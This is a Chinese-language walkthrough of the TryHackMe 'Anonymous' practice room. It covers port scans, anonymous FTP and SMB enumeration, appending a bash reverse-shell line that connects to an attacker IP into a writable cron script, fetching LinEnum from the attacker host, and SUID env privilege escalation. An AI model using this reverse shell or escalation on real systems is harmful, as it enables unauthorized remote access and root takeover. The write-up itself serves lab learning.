今天來解比較綜合的題目，Try Hack Me 上面的 Anonymous。

• 網址：https://tryhackme.com/room/anonymous
• IP : 10.10.142.45

掃 Port

• 掃 Port 起手式
  • rustscan -a 10.10.142.45 -r 1-65535 --ulimit 5000
    • 發現有開的 Port 是
    • 22 , 21 , 139 , 445
  • nmap -A -p21,22,139,445 10.10.142.45
    • 21 : FTP
      • VSFTPD 2.0.8
    • 22 : SSH
    • 139: SMB
    • 445: SMB
    • 

FTP

• 嘗試連接 ftp
  • ftp 10.10.142.45 使用 anonymous 登入
  • 
  • 發現裡面有一個 scripts 資料夾
    • 先把裡面所有檔案都載下來
    • 
      • 下載 FTP 的檔案可以用 get {檔名}
• 觀察檔案
  • clean.sh
    • 看起來是一段 清除資料的 bash script
    • 
  • removed_files.log
    • 看起來東西都是空的，是上述腳本的輸出
    • 
  • to_do.txt
    • 看起來沒有很重要
    • 

SMB

• 嘗試連線 SMB
  • 發現有一個 pics 資料夾
    • 
  • 裡面有兩張圖片
    • 
  • 把兩張圖片載下來
    • 
    • 一樣可以使用 get 指令
• 觀察圖片
  • 看起來是狗勾!
    • 
  • 用 Exif tool 觀察
    • 
    • 
    • 可以看出 Photoshop 編輯過
  • 但這些圖片貌似看不出什麼蛛絲馬跡

弱點利用

• 突然想到，說不定 ftp 上面的 clean.sh 是一個 cron job
  • 也就是說，它可能定時會執行一次
  • 我們既然有對 FTP 的讀寫的權限，可以在上面戳個 reverse shell 再傳上去
  • echo bash -c "'bash -i >& /dev/tcp /10.13.21.55/7877 0>&1'" >> clean.sh
  • 本地端開 nc -nlvp 來接
• 成功接上ㄌ
  • 
  • 取得 User flag
    • 

提權

• 起手式 sudo -l
  • 看起來沒東西 QQ
  • 
• 準備 Linenum 自動化枚舉程式
  • wget 10.13.21.55:8000/LinEnum.sh
  • 掃到了 /usr/bin/env 有 suid
  • 
• 透過 GTFOBins 尋找 env SUID 提權
  • 發現輸入 /usr/bin/env /bin/sh -p 即可提權
• 成功提權
  • 
  • 取得 Root Flag
    • 

心得

這一題告訴了我們，觀察可以讀寫的 bash shell 檔案，如果剛好遇到 Cron job，就有機會可以寫入 Reverse shell。另外也可以透過自動化枚舉程式，快速的找到可以用來提權的弱點。